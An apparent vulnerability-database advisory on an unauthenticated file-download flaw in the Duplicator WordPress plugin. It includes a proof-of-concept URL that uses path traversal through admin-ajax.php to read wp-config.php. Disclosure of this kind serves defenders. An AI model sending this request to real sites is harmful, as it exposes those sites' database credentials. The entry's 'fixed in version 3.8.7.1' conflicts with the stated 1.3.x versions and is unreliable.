Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download



Description
The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file.

According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php

Affects Plugins

fixed in version 3.8.7.1

References

URL https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
URL https://snapcreek.com/duplicator/docs/changelog/?lite
URL https://snapcreek.com/duplicator/docs/changelog/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Views 6531
Verified No
WPVDB ID 10078

Timeline

Publicly Published 2020-02-19 (about 1 month ago)
Added 2020-02-20 (about 1 month ago)
Last Updated 2020-02-29 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin